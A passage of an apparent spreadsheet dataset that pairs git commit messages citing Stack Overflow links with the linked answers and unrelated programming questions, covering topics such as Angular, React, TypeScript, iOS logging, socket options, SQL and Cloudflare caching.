We're wanting to shift to MVC architecture to make our pages more secure and manageable, however there is a major problem with this.  Each section of our Intranet system has cross-links to other pages in other sections.  So, for example, say we had a section called "Games" and in that we had a section called "People Playing Games" but this was actually just using a frame to point to a page which is in another folder on our Intranet system called "Personnel" then "People.aspx" (a pure example).  How would the MVC architecture deal with something like that?
We have pages displayed in completely different areas of our Intranet that are in actual fact the same page.  So having a URL like [external-link] would have to link to [external-link].
Hopefully this makes sense to people with experience in MVC architecture as well as pre-dated architectures such as the use of frames like we're doing.
The questions raised would be:
Do we have to have duplicate pages?
Is there a way to cross-reference a page in different sections using MVC?
For an Intranet system consisting of about 400 different pages, is MVC the way to go?
Cheers
</t>
  </si>
  <si>
    <t>C431</t>
  </si>
  <si>
    <t>app components header: make click handlers and icons accessible
https://stackoverflow.com/questions/70166265/styling-and-alt-ing-a-svg-react-component</t>
  </si>
  <si>
    <t>When inlining an SVG (your "svgTag" option) you can't use the alt attribute without giving it a role="img".
However there is an even better way to add text for screen readers on an SVG.
SVGs have the &lt;title&gt; attribute (think of that like alt on an image) and the &lt;desc&gt; attribute to provide a lot more detail about the image.
There is a great article by Carie Fisher on accessible SVGs
The pattern that seems to win out is:
&lt;svg role="img" aria-labelledby="svg1Title" class="someClass"&gt;
   &lt;title id="svg1Title"&gt;Logo&lt;/title&gt;
   [SVG paths etc.]
&lt;/svg&gt;
So this is ultimately what you need your &lt;Logo component to produce!
So if you use your first option (so you can style with CSS within the document, you can't do that with option 2) and then adjust the SVG to contain a &lt;title&gt; and the aria-labelledby pointing to the ID of that title you will have what you need.
The key bit is that your alt is essentially now &lt;title&gt; and you link that title to the SVG using aria-labelledby just to improve compatibility.
In React
Getting such html output from react should be possible with
&lt;Logo title='accessible Logo title'/&gt;
since React 3.1</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My code in pycharm3.1.1. (ollama0.4.7 has been installed by pip)&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import ollama
ollama.list()
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When running it, I get this errror:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Failed to connect to Ollama. Please check that Ollama is downloaded, running and accessible. https://ollama.com/downloadBut my ollama seems ok:1.http://localhost:11434/api/tags can be opened in the browser.2.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Windows command:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;C:\Users&amp;gt;netstat -aon|findstr 11434TCP    0.0.0.0:11434          0.0.0.0:0              LISTENING       24856TCP    [::]:11434             [::]:0                 LISTENING       24856
&lt;/code&gt;&lt;/pre&gt;
&lt;pre&gt;&lt;code&gt;C:\Users&amp;gt;tasklist|findstr &amp;quot;24856&amp;quot;ollama.exe                   24856 Console                    2     52,980 K
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The ollama service seems ok, so what is the problem? Am I using ollama in the wrong way?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C432</t>
  </si>
  <si>
    <t>fix: fixed linter problems in components
moduleResolution: true
y problemas de import de React y ReactDomcon https://stackoverflow.com/questions/51902844/node-modules-types-react-index-has-no-default-export</t>
  </si>
  <si>
    <t>You have to use import * as React from "react"; instead of import React from 'react'.
That happens because babel (the one that you were using before) assumes modules.export as default export while typescript (the one that you are using now) does not.</t>
  </si>
  <si>
    <t xml:space="preserve">I have a data tier select method that returns a datatable.  It's called from a business tier method that should then return a strongly typed generic List.
What I want to do is very similar (but not the same as) this question:
[external-link]
What's different is that I want the list to contain strongly-typed objects rather than datarows (also, I don't have linq avaiable here yet).  
I'm concerned about performance.  The business tier method will in turn be called from the presentation tier, and the results will be iterated for display to the user.  It seems very wasteful to add an extra iteration at the business tier, only do it again right away for the presentation, so I want this to be as quick as possible.
This is a common task, so I'm really looking for a good pattern that can be repeated over and over.
</t>
  </si>
  <si>
    <t>C433</t>
  </si>
  <si>
    <t>Organisation Model - remove countryList property - this is not accessible
https://stackoverflow.com/questions/77398916/why-would-a-public-property-on-a-class-not-be-accessible-when-an-instance-is-pas
OrganisationEdit component - build the organisation countrynames here, rather than in the model
Countries Component - remove ngOnInit - not needed</t>
  </si>
  <si>
    <t>EDIT: After looking at your Stackblitz, it's clear what the issue really is.
Your Organisation is a class, so when creating a new class, you should always use the new keyword. You are creating an anonymous object and casting is as the type (remember that Javascript has no knowledge of types). The only reason that it is working with the Object.assign line is because this.organisation was created using new and Object.assign uses that original object to create the new object from. Simply changing your anonymous objects to ones that are actual classes solves the problem.
    var org1 = new Organisation();
    org1.organisationName = 'Smith &amp; Co';
    org1.id = 492;
    this.organisations.push(org1);
    var org2 = new Organisation();
    org2.organisationName = 'Jonas Brothers';
    org2.id = 47;
    this.organisations.push(org2);
    var org3 = new Organisation();
    org3.organisationName = 'Browns Ltd';
    org3.id = 1033;
    this.organisations.push(org3);
    // Display a selected organisation in app-organisation component
    // organisation is bound to app-organisation in the template above
    this.organisation = this.organisations[2]; // displayName IS accessible
So, in your return from your API, you will need to map all the objects to your class using the new keyword. You can add a constructor with the parameters you need so that you don't have to set every property on a single line.
It's also worth mentioning, I wouldn't recommend using classes this way to just get your display name. I would skip mapping the objects entirely and just use an interface or type, then get your display name using a custom angular pipe.
ORIGINAL ANSWER
The problem may be that you are setting a default value to the input property...
export class OrganisationEditComponent implements OnInit, OnDestroy {
  @Input() organisation = new Organisation();
Setting a default value might cause unexpected behavior if you are really expecting the value to be set from outside the component. When the OnInit fires, it's possible you might not have the value from the outside and you still have the default value. That really depends on the parent components, which you didn't include in the question.
I would recommend that you do something like this...
export class OrganisationEditComponent implements OnInit, OnDestroy {
  @Input() organisation: Organisation | undefined;
Then later in your code, you will be forced to make sure the the organisation input has been set before you try accessing it or it's members.
Doing this is typically a bad idea...
@Input() organisation!: Organisation;
Because, the ! only tells the Typescript compiler to "pretend" that the property will never be null or undefined. It doesn't actually do anything at runtime. This can cause bugs if the value is ever null or undefined at runtime. Use ! with extreme caution.
Side note:
I wouldn't create classes the way you show. There are a few issues with the way you have your Organisation class. I recommend the following...
Always use camel casing
Make backing properties private and use a setter of the properties have the same name and meaning.
OR change the name of the getter to represent the meaning better (for example if you need to transform the value)
export class Organisation {
  private _organisationName = '';
  public get organisationName(): string {
    return this._organisationName;
  }
  public set organisationName(value: string) {
    this._organisationName = value;
  }
  // Example to illustrate a single getter and changing the name
  public get displayName(): string {
    return `Your organisation: ${this._organisationName}`;
  }
}</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am sending push notifications on iOS, and I can receive and display them correctly. I want to be able to dismiss notifications that have been read server-side (e.g. on a different device) so I am trying to send a custom payload with a badge counter update, that specifies what notification IDs to remove. I then use &lt;a href="https://developer.apple.com/documentation/usernotifications/unusernotificationcenter/removedeliverednotifications(withidentifiers:)" rel="nofollow noreferrer"&gt;removeDeliveredNotifications&lt;/a&gt; on the IDs I get. However, it doesn't seem to be working. I am setting the identifier using the &lt;code&gt;apns-collapse-id&lt;/code&gt; header and I do see that reflected on the client side. Any ideas what I might be doing wrong?&lt;/p&gt;
&lt;pre class="lang-swift prettyprint-override"&gt;&lt;code&gt;  func userNotificationCenter(
    _ center: UNUserNotificationCenter,
    willPresent notification: UNNotification,
    withCompletionHandler completionHandler: @escaping (UNNotificationPresentationOptions) -&amp;gt; Void
  ) {
    let customPayload = notification.request.content.userInfo
    if let dismissedNotifications = customPayload[&amp;quot;dismissed_notifications&amp;quot;] as? [String] {
      center.removeDeliveredNotifications(withIdentifiers: dismissedNotifications)
    }
    completionHandler([.banner, .sound, .badge])
  }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I've also tried looking for the notification IDs in &lt;code&gt;getDeliveredNotifications&lt;/code&gt; and the notification IDs I am sending do in fact correspond to received notifications. But this also does not result in the notifications getting dismissed on the device.&lt;/p&gt;
&lt;pre class="lang-swift prettyprint-override"&gt;&lt;code&gt;      center.getDeliveredNotifications(completionHandler: { notifications in
        var identifiersToRemove: [String] = []
        for notification in notifications {
          if dismissedNotifications.contains(notification.request.identifier) {
            identifiersToRemove.append(notification.request.identifier)
          }
        }
        center.removeDeliveredNotifications(withIdentifiers: identifiersToRemove)
      })
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C434</t>
  </si>
  <si>
    <t>feat: added logging to some components + LocationManage tweaks (#108)
https://github.com/CocoaLumberjack/CocoaLumberjack
https://stackoverflow.com/questions/55259546/ios-save-to-log-file-and-extract-later</t>
  </si>
  <si>
    <t>Ok so i managed to do so with "CocoaLumberjack" pod.
Pretty much as in the documentation.
I have created a file like so:
import Foundation
import CocoaLumberjack
func setupLogging() {
   DDLog.add(DDOSLogger.sharedInstance) // Uses os_log
   let fileLogger: DDFileLogger = DDFileLogger() // File Logger
   fileLogger.rollingFrequency = 60 * 60 * 24 // 24 hours
   fileLogger.logFileManager.maximumNumberOfLogFiles = 7
   DDLog.add(fileLogger)
}
func writeLog(message: String) {
   DDLogDebug(message)
}
In appDelegate i did this:
func application(_ application: UIApplication, didFinishLaunchingWithOptions launchOptions: [UIApplicationLaunchOptionsKey: Any]?) -&gt; Bool {
    // Override point for customization after application launch.
    setupLogging()
    return true
}
And then wherever i wanted to write a log i did like so:
writeLog(message: "test")
After finishing i had to extract the log like so:
windows -&gt; devices and simulator -&gt; choose the device -&gt; choose the app -&gt; scroll down to the gear icon -&gt; download container -&gt; then show package contents -&gt; library/caches/logs
:)</t>
  </si>
  <si>
    <t xml:space="preserve">I've heard that the components in the upcoming Flex 4 framework will be more loosely coupled possibly allowing for smaller filesizes for projects that use relatively few components. It this true? Or will the entire Flex framework still get bundled into each SWF that uses a single Flex 4 component?
If it is true, and we could compile fairly small SWFs, what sort of SWF filesize could we expect for a very minimal Flex 4 app? By minimal I mean a VBox with some text in it and a Scroll Bar.
EDIT:
Ok, my bad, need to do more research before posting such a question in the future: Flex 4 is built on top of the Flex 3 architecture, so SWFs will still need to bundle the Flex framework (or use RSL to separate the Framework bytecode from the application bytecode - as mentioned below).
see:
[external-link]
[external-link]
</t>
  </si>
  <si>
    <t>C435</t>
  </si>
  <si>
    <t>skip setting SO_REUSEADDR when socket is AF_UNIX
Summary:
After D38076789 (facebook/folly@4a18fd1), we started to actually set `SO_REUSEADDR` on Windows. This has broken our build because we are using `folly::AsyncServerSocket` with a UNIX Domain Socket address on Windows. Setting `SO_REUSEADDR` on the socket confuses Windows and making it failed to bind.
It looks like we can safely skip setting `SO_REUSEADDR` when the address family is `AF_UNIX`. Neither Linux nor BSD supports it.
https://gavv.net/articles/unix-socket-reuse/
https://stackoverflow.com/a/15717204
Reviewed By: kvtsoy</t>
  </si>
  <si>
    <t>I only have access to one POSIX specification document, which is
System Interfaces
, so I'm going to do my best from here.
Our specification spelunking adventure must of course start in
2.10.6 Use of Options
, which defines the
SO_REUSEADDR
option as follows:
The SO_REUSEADDR option indicates that the rules used in validating addresses supplied in a bind() should allow reuse of local addresses. Operation of this option is protocol-specific. The default value for SO_REUSEADDR is off; that is, reuse of local addresses is not permitted.
This paragraph basically disclaims any specification of what this option truly does, by delegating it to the specification of the underlying protocol.
Section 2.10.17 Use of Sockets for Local UNIX Connections
describes the mechanics of creating UNIX domain sockets, but really the only thing it tells us is what socket type constant to use and which struct to use for addresses.
The documentation for the
sockaddr_un
struct
tells us only about its format, not about its behavior on
bind
.
The documentation for
bind
itself
is understandably protocol-agnostic, telling us only what happens when the address is already in use, not the circumstances under which re-binding the same socket is valid.
Although it's not a POSIX standard document, Fujitsu has
a document on the POSIX sockets API
which is interesting if only because it's not specifically about Linux or BSD. Section 2.6.4 of this document has the following to say about the behavior of
bind
on UNIX sockets:
The path name, which must be specified in the
sun.sun_path
component, is created as a file in the file system using
bind()
. The process that calls
bind()
must therefore have write rights to the directory in which the file is to be written. The system does not delete the file. It should therefore be deleted by the process when it is no longer required.
Although this says nothing about
SO_REUSEADDR
in particular, it does state that the behavior of
bind
is to
create
a file, and that it is the responsibility of the binding process to remove it when it's no longer being used.
Finally, this document's description of
setsockopt
has the following to say about
SO_REUSEADDR
:
Specifies that the rules for the validity check on the addresses specified for bind() should permit the reuse of local addresses
provided this is supported by the protocol
.
So while this makes no specific mention of
AF_UNIX
, it
does
acknowledge that this option doesn't apply to all protocols.
I also found
a (non-authoritative) summary describing the
intended
purpose of
SO_REUSEADDR
:
This socket option tells the kernel that even if this port is busy (in the
TIME_WAIT
state), go ahead and reuse it anyway.  If it is busy, but with another state, you will still get an address already in use error.
The
TIME_WAIT
state exists primarily for Internet-facing sockets to avoid a new program binding to a port that was recently being used by another program and inadvertently receiving packets relating to the old program. This problem is arguably not applicable to UNIX domain sockets because it's very unlikely that two programs would attempt to create a socket at the same path, so if
TIME_WAIT
is not implemented for UNIX sockets then that could be one (approximation of an) explanation for why
SO_REUSEADDR
does not apply to
AF_UNIX
.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to write a case statement that will capture various scenarios per usual, but then also capture all previous scenarios in one combined case. Basically a total of all possible scenarios.&lt;/p&gt;
&lt;p&gt;I'm not getting a final row in my results.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Select
  Case 
  When q1.type = 'b' then 'blue'
  When q1.type = 'g' then 'green'
  When q1.type is null then 'nothing'
  When q1.type in (NULL, 'b', 'g') then 'total'
  End as color
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How can I pull this off?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C436</t>
  </si>
  <si>
    <t>fix CameraFocal by Parent Constraints component
https://stackoverflow.com/questions/52179975/make-child-unaffected-by-parents-rotation-unity</t>
  </si>
  <si>
    <t>If you really don't want destory parent-child hierarchy,  you could rotate child  every frame to counteract parent rotation.
Let's say we have the follow scene,
Add the follow
RestoreOriginRotation.cs
to child object, we can get a stable child rotation.
What we can get.
****If you don't concern the underlying math, you chould stop here. ***</t>
  </si>
  <si>
    <t xml:space="preserve">I have a library, and I want to migrate it from an old system to a new optimized one.
The old library was built using MS Access (mdb files), where each book is a file by itself. Each book consists of two tables, one for chapters titles and the second for contents. There is also one mdb file that contains all books names, pages number for each book, authors names and other general info.
The new system database engine is MySQL, so I have three (maybe) possibilities for storing books:
1- Store all the books chapters titles in one table, and all books contents in another huge table.
2- Store all books chapters titles in one table, and every book's content in a table for this book. (so if I have 5 books, I'll get 1 table for chapters titles and 5 for content).
3- Store them as the old system's design, each book has two tables, one for it's chapters titles and the second for it's content.
I don't prefer to use multiple databases, one database can do the job perfectly as the blogs hosted by wordpress.com (yap, they have huge database and of course they use other techniques, but I'm talking about DB system architecture).
There are more than 500 books in that library and the number is increasing.
What do you think?
</t>
  </si>
  <si>
    <t>C437</t>
  </si>
  <si>
    <t>modified ticket-list-component.ts
- funktioniert nun
- verwendet event.currentTarget anstatt event.target  (https://stackoverflow.com/questions/52177765/e-target-calling-wrong-target)
- refactor + hinzufügen von clicklistener</t>
  </si>
  <si>
    <t xml:space="preserve">Behavior is as expected. Per MDN, event.target is
A reference to the object that dispatched the event. It is different from event.currentTarget when the event handler is called during the bubbling or capturing phase of the event.
The innermost element that was clicked on was the img, so the img is the target of the event.
If you wanted a reference to the element the handler is on, use e.currentTarget instead:
$('.star-span').click(e =&gt; {
  console.log(e.currentTarget);
});
&lt;script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"&gt;&lt;/script&gt;
&lt;span class="star-span" id="1"&gt;
  	&lt;img class="star-img" width="15%" src="https://upload.wikimedia.org/wikipedia/commons/thumb/1/18/Five-pointed_star.svg/2000px-Five-pointed_star.svg.png" /&gt;
&lt;/span&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been trying to compute the entanglement entropy for Bell Diagonal states. I tried many implementations in python and all of them gave me that all possible states have this entropy equal to 1.&lt;/p&gt;
&lt;p&gt;This is completely wrong, because the only entangled states should be the points of the tetrahedron formed by the Bell Diagonal states, as it is shown in Figure 7 of this &lt;a href="https://www.mdpi.com/1099-4300/23/7/797" rel="nofollow noreferrer"&gt;article&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;I have no idea of what I'm doing wrong.&lt;/p&gt;
&lt;p&gt;This is my code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import numpy as np
import qutip as q
def tetrahedron(a1, a2, a3):
    is_bellD_state = False
    plano1 = a1 - a2 + a3
    plano2 = a1 + a2 - a3
    plano3 = a1 - a2 - a3
    plano4 = a1 + a2 + a3
    if plano1 &amp;gt;= -1 and plano2  &amp;gt;= -1 and plano3 &amp;lt;= 1 and plano4 &amp;lt;= 1:
        is_bellD_state = True
    return is_bellD_state
def Bell_Diagonal_Density_Matrix(e):
    bell_density_matrices = []
    for b in ['00', '01', '10', '11']:
        bell_density_matrices.append( q.bell_state(b) * q.bell_state(b).dag() )
    rho = q.Qobj(np.zeros((4,4)), dims=[[2,2],[2,2]])
    for i in range(4):
        rho = rho + e[i]*bell_density_matrices[i]
    return rho
def Entanglement_Entropy(rho_A):
    eigvals = np.linalg.eigvalsh(rho_A)
    eigvals = eigvals[eigvals &amp;gt; 0]
    S = 0
    for v in eigvals:
        S = S - v*np.log(v)/np.log(2)
    return S
## MAIN ##
a = np.arange(-1, 1, 0.1)
for a1 in a:
    for a2 in a:
        for a3 in a:
            if tetrahedron(a1, a2, a3):
                M = [[1,1,-1,1], [1,1,1,-1], [1,-1,1,1], [1,-1,-1,-1]]
                e = np.dot(M, [1, a1, a2, a3])/4
                if np.isclose(sum(e), 1):
                    rho = Bell_Diagonal_Density_Matrix(e)
                    rho_A = rho.ptrace(0)
                    S = Entanglement_Entropy(rho_A)
                    print(S)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I decided to use &lt;code&gt;qutip&lt;/code&gt; because I thought I was computing the partial trace wrong, but I'm also not sure if I'm using &lt;code&gt;qutip&lt;/code&gt; correctly.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C438</t>
  </si>
  <si>
    <t>use transient props for styled components to fix warnings
see: https://stackoverflow.com/a/62456493</t>
  </si>
  <si>
    <t xml:space="preserve">Here is the problem : our main class (say : Contract) change every year. Some properties are added, other are removed. We don't know how it will look next year. It may change a lot or not at all.
On the other hand, we now (new requirement...) have to keep an historic of every contracts. Each time the user update a contract, the whole object must be stored in a backup (e.g. - serialized in a table).
Of course, we must be able to read it back... One option (brutal) is to have a new Contract class every year (Contract2008, Contract2009, ...).
But it would be very cumbersome (and ugly) since a lot of classes depend on Contract - in facts, we would have to create a bunch of new classes every year.
Ever have this kind of problem ? Any suggestion ?
Thanks in advance !
(We're using C# 2.0.)
ADDED : Thank for your answers. We're now asking ourself how we could use a dictionary / an XML file to implement versioning without breaking all the code. Dictionary seems very sexy in this context :o)
</t>
  </si>
  <si>
    <t>C439</t>
  </si>
  <si>
    <t>fix: Styler typescript import cycle
https://stackoverflow.com/questions/67539780/one-or-more-import-cycles-would-need-to-be-created-to-compile-this-component-wh</t>
  </si>
  <si>
    <t>The problem was I have an interface declared in my Library main module and one of my components imported that interface. So I have to move the interface to a new file and share it both in the modules file and component file.
Below is the Module code which is shared in the component
export interface WebsiteEnvironment {. // as this in the module file and imported in one of the component, it created the problem
  restUrl?: string;
  alertDelayInSeconds?: number;
  loginUrl: string;
  allowTokenToAllDomain?: string;
}
@NgModule({
  imports: [
    ...
  ],
  declarations: [
    ...
  ],
  exports: [
    ...
  ],
  entryComponents: [
    ...
  ]
})
export class WebsiteModule {
  public static forRoot(websiteEnvironment: WebsiteEnvironment): ModuleWithProviders&lt;WebsiteModule&gt; {
    return {
      ngModule: WebsiteModule,
      providers: [
        ...
      ]
    };
  }
  constructor(@Optional() @SkipSelf() parentModule: WebsiteModule) {
    if (parentModule) {
      throw new Error(
        ...
    }
  }
}
Simply removed the interface. create a new file and add that interface. share the interface import in both module and component will remove the circular dependency</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have many application-&lt;code&gt;&amp;lt;environment&amp;gt;&lt;/code&gt;.yaml files in my resources folder. I would like to only include the default and active profile files in my builds for deployment. I have this in my build.gradle file:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;processResources {
  def env = project.findProperty('env')
  include &amp;quot;application.yaml&amp;quot;
  include &amp;quot;application-${env}.yaml&amp;quot;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The &lt;em&gt;env&lt;/em&gt; property is passed to gradle using &lt;em&gt;-Penv=alpha&lt;/em&gt;. The build properly has the &lt;em&gt;application.yaml&lt;/em&gt; and &lt;em&gt;application-alpha.yaml&lt;/em&gt; files in the &lt;em&gt;build/resources/main&lt;/em&gt; folder with no other yaml files. When I deploy to GCP Flex engine, setting the active Spring profile to &lt;em&gt;alpha&lt;/em&gt;, it does not read the settings from the &lt;em&gt;application-alpha.yaml&lt;/em&gt; file, only the default. The app engine log says the active profile is indeed &lt;em&gt;alpha&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;On the other hand, if I have this in my build.gradle file:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;processResources {
   include &amp;quot;application.yaml&amp;quot;
   include &amp;quot;application-alpha.yaml&amp;quot;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The build has the same two properties files and GCP Flex engine actually uses the settings in the &lt;em&gt;application-alpha.yaml&lt;/em&gt; file.&lt;/p&gt;
&lt;p&gt;Why does Flex engine only seem to read the &lt;em&gt;application-alpha.yaml&lt;/em&gt; file overrides if I hard code the file name in the processResources section?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C44</t>
  </si>
  <si>
    <t>Show Salaries table on each employee page with editable/deletable rows
Angular Front-End:
- Create salary.ts interface and Refactor/Move Angular models (salary/employee interfaces) to "models" folder
- Create salary.service.ts class to make HTTP Requests to REST API
- employee.component.html Display salaries as a table with inputs on each Employee page
- employee.component.ts Create getSalariesByEmployeeId() called on init
- employee.component.ts Create onUpdateSalaries that handles salaries with same "name" as inputs
- employee.component.ts Create onDeleteSalary
Resources used:
- ChatGPT
- https://stackoverflow.com/questions/54475893/typescript-type-x-is-missing-the-following-properties-from-type-y-length-pop</t>
  </si>
  <si>
    <t>You are returning Observable&lt;Product&gt; and expecting it to be Product[] inside subscribe callback.
The Type returned from http.get() and getProducts() should be Observable&lt;Product[]&gt;
public getProducts(): Observable&lt;Product[]&gt; {
    return this.http.get&lt;Product[]&gt;(`api/products/v1/`);
}</t>
  </si>
  <si>
    <t xml:space="preserve">Does anyone have any experience with how well web services build with Microsoft's WCF will scale to a large number of users?
The level I'm thinking of is in the region of 1000+ client users connecting to a collection of WCF services providing the business logic for our application, and these talking to a database - similar to a traditional 3-tier architecture. 
Are there any particular gotchas that have slowed down performance, or any design lessons learnt that have enabled this level of scalability?
</t>
  </si>
  <si>
    <t>C440</t>
  </si>
  <si>
    <t>set up theme provider
https://stackoverflow.com/questions/43502813/using-javascript-variables-with-styled-components</t>
  </si>
  <si>
    <t>I eventually figured this out, so here's how you can do it, at least if using React.
You need to define the variables in one file and export them.
// Variables.js
export const FONTSIZE_5 = '20px';
Then you need to import those variables into each component file.
// Button.js
import * as palette from './Variables.js';
Then you can use the variables in your styled-components like this:
const Button = styled.button`
  font-size: ${palette.FONTSIZE_5};
`;</t>
  </si>
  <si>
    <t xml:space="preserve">I'm trying to find out the best way to handle transactions at object level (not database level). Short example: 4 objects A, B, C and D. A starts a transaction and calls methods in B and C. Whithin this transaction C is also calling D. The methods being called aren't supposed to always participate in this transaction, but can be called also on their own. Are there any patterns for managing transactions at object level?
I didn't really find something, so I came up with this: Use a TransactionContext where one can register TransactionListeners. If a transaction is started using the TransactionContext, then it will inject the running transaction into each of the registered listeners, which in turn will use a running transaction or elsewise will start one on their own if needed. This way I'm pretty free to decide wether I want an object participating in my transaction or not.
The problem comes when having object calling chains like above. When starting the transaction I just know that B and C must participate in the transaction so I add them to the TransactionContext. But what about D? I don't really want to pass the TransactionContext around to B and C.
I would appreciate some input on my approach as well as some pointers to proven patterns (even better).
</t>
  </si>
  <si>
    <t>C441</t>
  </si>
  <si>
    <t>extendin album. To be fixed: Material-UI: A component is changing the uncontrolled value state of Autocomplete to be controlled.
see https://stackoverflow.com/a/63300376/7362888</t>
  </si>
  <si>
    <t>You ensured that the value property never had been undefined, but you had to do same for inputValue.
the "value" state with the value/onChange props combination. This state represents the value selected by the user, for instance when pressing Enter.
the "input value" state with the inputValue/onInputChange props combination. This state represents the value displayed in the textbox.
⚠️ These two state are isolated, they should be controlled independently.
Component becomes uncontrolled when inputValue property is undefined, and vice versa.
If in the following example you delete an empty string from React.useState('') you'll get the same error message because inputValue during first render is undefined.
import React from 'react'
import TextField from '@material-ui/core/TextField'
import Autocomplete from '@material-ui/lab/Autocomplete'
const options = ['Option 1', 'Option 2']
export default function AutocompleteLab() {
  const [value, setValue] = React.useState(options[0])
  const [inputValue, setInputValue] = React.useState('')
  return (
    &lt;div&gt;
      &lt;div&gt;{`value: ${value !== null ? `'${value}'` : 'null'}`}&lt;/div&gt;
      &lt;div&gt;{`inputValue: '${inputValue}'`}&lt;/div&gt;
      &lt;br /&gt;
      &lt;Autocomplete
        value={value}
        onChange={(_, newValue) =&gt; {
          setValue(newValue)
        }}
        inputValue={inputValue}
        onInputChange={(_, newInputValue) =&gt; {
          setInputValue(newInputValue)
        }}
        options={options}
        style={{ width: 300 }}
        renderInput={(params) =&gt; &lt;TextField {...params} label="Name" variant="outlined" /&gt;}
      /&gt;
    &lt;/div&gt;
  )
}</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to stand up a new cluster in AWS EMR, but it immediately fails with the following error:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Service-linked role 'AWSServiceRoleForEMRCleanup' for EMR is required.
Please create this role directly or add permission to create it in
your IAM entity.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;My service role for EMR has the following permission:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;  - Effect: Allow
    Action:
      - iam:CreateServiceLinkedRole
      - iam:PutRolePolicy
    Resource:
      - &amp;quot;arn:aws:iam::&amp;lt;account-id&amp;gt;:role/aws-service-role/elasticmapreduce.amazonaws.com/AWSServiceRoleForEMRCleanup&amp;quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I've tried using &lt;code&gt;*&lt;/code&gt; as the resource as well, which produces the same results.&lt;/p&gt;
&lt;p&gt;I have also attempted to create the role directly as the error suggests, but that fails due to &lt;code&gt;AWSServiceRole&lt;/code&gt; being a reserved prefix for role names created by AWS.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C442</t>
  </si>
  <si>
    <t>fix: switch to .scss (sass) for styles
- renamed PaletteCell.css and Palette.css to use .scss extension,
- adjusted imports accordingly,
- modified Jest configuration to handle scss files using the
  following stackoverflow suggestion:
 https://stackoverflow.com/questions/41040269/syntax-error-when-test-component-with-sass-file-imported#answer-44323162
  We may want to use the following, ultimately: https://stackoverflow.com/questions/41040269/syntax-error-when-test-component-with-sass-file-imported#answer-41043021</t>
  </si>
  <si>
    <t>You have do define a mock for this kind of file by define  moduleNameMapper in your jest settings.
We are using identity-obj-proxy. So install it with
npm install identity-obj-proxy --save-dev 
and add it your jest setting:
"moduleNameMapper": {
    "^.+\\.(css|less|scss)$": "identity-obj-proxy"
  }</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to displays schedules, maps and other informations on displays in a building for visitors. These displays would provide at most mouse input but no keyboard.
Ten years ago this was the domain of Macromedia Director but today I believe that browsers and content management systems provide a better architecture. However, I could not find a single open source system for this purpose, not even some CSS styles. I would be grateful for ideas how to implement public information systems that are low on interactivity.
</t>
  </si>
  <si>
    <t>C443</t>
  </si>
  <si>
    <t xml:space="preserve"> did the trick for client component importing from page by creating ThemeContext component, ref from https://stackoverflow.com/questions/76181096/typeerror-createcontext-only-works-in-client-components-add-the-use-client-d</t>
  </si>
  <si>
    <t>Obviously, the button you are importing is using client-side hooks, createContext in this case. For this to work, you need to add "use client" at the top of the file. But it would mean the page becomes a Client Component, and no longer a Server Component.
If that bothers you, you could, for example, create a lib folder at the same level as app in which you add a mui.js file, like so:
// lib/mui.js
"use client";
export * from "@mui/material";
And you import it from there (this way, other parts of the page are still Server Components):
// app/page.js
import { Button } from "../lib/mui";
export default function Home() {
  return (
    &lt;div&gt;
      &lt;Button variant="contained"&gt;Hello World&lt;/Button&gt;
    &lt;/div&gt;
  );
}
Side note, you may get a similar error while setting up a context. It means you are trying to set it up in a Server Component. The guideline is to add it in its own "use client" marked file:
// app/theme-provider.tsx
"use client";
import { createContext } from "react";
export const ThemeContext = createContext("");
export default function ThemeProvider({ children }) {
  return (
    &lt;ThemeContext.Provider value="dark"&gt;
      {children}
    &lt;/ThemeContext.Provider&gt;
  );
}
And import it from there:
// app/layout.js
import ThemeProvider from './theme-provider';
export default function RootLayout({ children }) {
  return (
    &lt;html&gt;
      &lt;body&gt;
        &lt;ThemeProvider&gt;{children}&lt;/ThemeProvider&gt;
      &lt;/body&gt;
    &lt;/html&gt;
  );
}
For an even more elaborate answer, check out this thread.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using &lt;code&gt;Cloudflare&lt;/code&gt; as a CDN to cache .m4s video chunk files for DASH streaming, but Cloudflare keeps returning cf-cache-status: DYNAMIC, meaning the files are not being cached.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;My Setup:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Cloudflare Cache Rule:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;(http.host eq &amp;quot;cdn.cineflare.net&amp;quot; and http.request.uri.path contains &amp;quot;/video-cmaf/&amp;quot; and http.request.uri.path contains &amp;quot;.m4s&amp;quot;)
